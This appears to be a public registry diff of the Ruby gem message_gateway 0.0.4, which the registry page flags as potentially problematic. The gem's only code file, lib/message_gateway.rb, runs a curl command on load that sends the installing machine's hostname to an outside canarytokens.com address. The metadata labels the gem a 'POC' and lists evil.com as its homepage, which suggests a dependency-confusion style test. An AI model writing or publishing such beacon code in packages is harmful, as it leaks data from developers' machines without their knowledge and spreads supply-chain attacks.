message_gateway 0.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of message_gateway might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/message_gateway.rb +1 -0
  3. metadata +44 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 9afc557b3691dcd145f18ee2cdce8734897caa697a6649a46910301348d699e8
4
+ data.tar.gz: 66f120cefcf5248d178ed9fa0dd791555e69c9012aa818cc97cec01322c96f06
5
+ SHA512:
6
+ metadata.gz: e878186ac5957a9545fedea7931d1b28f9c82fc5808b7b8870996c0484aa1ed636a2b5b0f38e730fa5c2de319da76981b885a936e20f43d72029cd87cf466bf5
7
+ data.tar.gz: 895cdbdc2169ca4340709e1b55f6c02f5b38fc6f7f3f0eb2765e6f2a34e933229a6ee041a07933e1cca33cf9927dfe72eb4bbd8b7eb07954470acb2b19c3f89f
@@ -0,0 +1 @@
1
+ system("curl http://39lxyayikbcmarkjky8niwxun.canarytokens.com/?host=#{`hostname`.strip}")
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: message_gateway
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.4
5
+ platform: ruby
6
+ authors:
7
+ - Hide_khan
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2025-07-27 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This is POC. Hide_khan here
14
+ email:
15
+ - you@example.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - lib/message_gateway.rb
21
+ homepage: https://evil.com
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.3.26
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: Hide_khan here
44
+ test_files: []